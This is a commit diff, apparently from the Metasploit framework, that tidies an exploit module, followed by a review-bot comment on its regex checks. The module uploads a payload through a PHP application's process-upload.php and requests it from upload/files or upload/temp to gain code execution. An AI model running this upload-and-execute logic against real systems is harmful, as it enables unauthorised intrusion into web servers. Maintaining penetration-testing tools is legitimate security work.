Do minor cleanup
parent
5c82b8a827
commit
b5b0be9001
|
@ -67,20 +67,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
elsif res.code.to_i == 500
|
||||
vprint_error("#{peer} - Unable to write file")
|
||||
return Exploit::CheckCode::Safe
|
||||
elsif res.code.to_i == 200 && res.body =~ /<\?php/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
|
||||
vprint_error("#{peer} - File process-upload.php is not executable")
|
||||
return Exploit::CheckCode::Safe
|
||||
elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/
|
||||
vprint_error("#{peer} - Software is misconfigured")
|
||||
return Exploit::CheckCode::Safe
|
||||
elsif res.code.to_i == 200 && res.body =~ /jsonrpc/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/
|
||||
# response on revision 118 onwards includes the file name
|
||||
if res.body =~ /NewFileName/
|
||||
if res.body && res.body =~ /NewFileName/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
# response on revisions 100 to 117 does not include the file name
|
||||
elsif res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
|
||||
elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
|
||||
return Exploit::CheckCode::Appears
|
||||
elsif res.body =~ /Failed to open output stream/
|
||||
elsif res.body && res.body =~ /Failed to open output stream/
|
||||
vprint_error("#{peer} - Upload folder is not writable")
|
||||
return Exploit::CheckCode::Safe
|
||||
else
|
||||
|
@ -113,14 +113,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Failure::NotFound, "#{peer} - No process-upload.php found")
|
||||
elsif res.code.to_i == 500
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
|
||||
elsif res.code.to_i == 200 && res.body =~ /Failed to open output stream/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable")
|
||||
elsif res.code.to_i == 200 && res.body =~ /<\?php/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable")
|
||||
elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured")
|
||||
# response on revision 118 onwards includes the file name
|
||||
elsif res.code.to_i == 200 && res.body =~ /NewFileName/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/
|
||||
print_good("#{peer} - Payload uploaded successfully (#{fname})")
|
||||
return fname
|
||||
# response on revisions 100 to 117 does not include the file name
|
||||
|
@ -139,10 +139,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exec(upload_path)
|
||||
print_status("#{peer} - Executing #{upload_path}...")
|
||||
res = send_request_raw(
|
||||
'uri' => normalize_uri(target_uri.path, upload_path)
|
||||
{ 'uri' => normalize_uri(target_uri.path, upload_path) }, 5
|
||||
)
|
||||
if !res
|
||||
print_error("#{peer} - Request timed out while executing")
|
||||
print_status("#{peer} - Request timed out while executing")
|
||||
elsif res.code.to_i == 404
|
||||
vprint_error("#{peer} - Not found: #{upload_path}")
|
||||
elsif res.code.to_i == 200
|
||||
|
@ -159,6 +159,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fname = upload
|
||||
register_files_for_cleanup(fname)
|
||||
exec("upload/files/#{fname}") # default for r-221 onwards
|
||||
unless session_created?
|
||||
exec("upload/temp/#{fname}") # default for r-100 to r-219
|
||||
end
|
||||
end
|
||||
end
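Review bot: The `sys.config.php` test in the second hunk (`elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/`) still leaves the dots unescaped, while the same test in the first hunk was tightened to `/sys\.config\.php/`. Both branches should use `/sys\.config\.php/` so the check path and the upload path classify a response the same way. The page has lost its `+`/`-` markers, so this assumes the second line of each printed pair is the new side. The JSON pattern in the first hunk, `/{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/`, also treats `.` as a wildcard and uses bare braces, so `res.body.include?('{"jsonrpc" : "2.0", "result" : null, "id" : "id"}')` would state the exact match that seems intended. The repeated `res.body && res.body =~ ...` guard could be replaced by a single `body = res.body.to_s` before each `elsif` chain, but both chains begin outside the visible hunks, so that belongs in the full methods.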
|
||||
|
|